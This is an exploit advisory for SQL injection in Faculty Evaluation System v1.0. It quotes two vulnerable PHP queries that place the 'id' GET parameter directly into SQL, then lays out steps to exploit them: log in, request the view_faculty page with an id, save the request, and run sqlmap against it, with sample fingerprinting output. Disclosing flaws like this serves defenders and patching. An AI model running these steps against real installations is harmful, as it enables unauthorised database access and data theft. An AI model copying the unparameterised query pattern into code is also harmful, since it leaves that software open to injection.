# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection# Date: 07/2023# Exploit Author: Andrey Stoykov# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip# Version: 1.0# Tested on: Windows Server 2022
SQLi #1
File: edit_evaluation
Line #4
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();[...]
SQLi #2
File: view_faculty.php
Line #4// Add "id" parameter after "view_faculty" parameter then add equals "id"with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();[...]
Steps to Exploit:1. Login to application
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"3. Copy request to intercept proxy to file4. Exploit using SQLMap
sqlmap -r test.txt--threads 1--dbms=mysql --fingerprint
[...][INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >=5.7
comment injection fingerprint: MySQL 5.6.49
fork fingerprint: MariaDB
[...]
